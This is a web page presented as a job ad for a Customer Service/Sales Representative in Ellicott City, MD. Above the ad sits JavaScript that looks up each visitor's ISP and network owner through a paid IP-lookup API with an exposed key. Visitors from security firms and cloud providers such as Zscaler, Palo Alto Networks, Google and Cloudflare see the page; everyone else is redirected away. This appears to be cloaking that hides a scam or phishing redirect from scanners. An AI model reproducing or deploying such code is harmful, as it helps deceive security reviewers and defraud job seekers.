Customer Service/Sales
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a motivated Customer Service/Sales Representative in Ellicott City, MD to provide exceptional support and drive sales growth.
Key Responsibilities:
- Assist customers with product inquiries, purchases, and troubleshooting via phone, email, and in-person interactions.
- Identify customer needs and recommend suitable products or services.
- Process transactions accurately and efficiently.
- Maintain detailed customer records and follow up to ensure satisfaction.
- Promote new products and sales promotions to maximize revenue.
Skills Needed:
- Excellent communication and interpersonal skills.
- Strong problem-solving abilities and attention to detail.
- Ability to work in a fast-paced environment and handle multiple tasks.
- Team player with a positive attitude.
Benefits:
- Competitive compensation package.
- Flexible work schedule.
- Employee discounts and incentives.
- Opportunities for growth and advancement.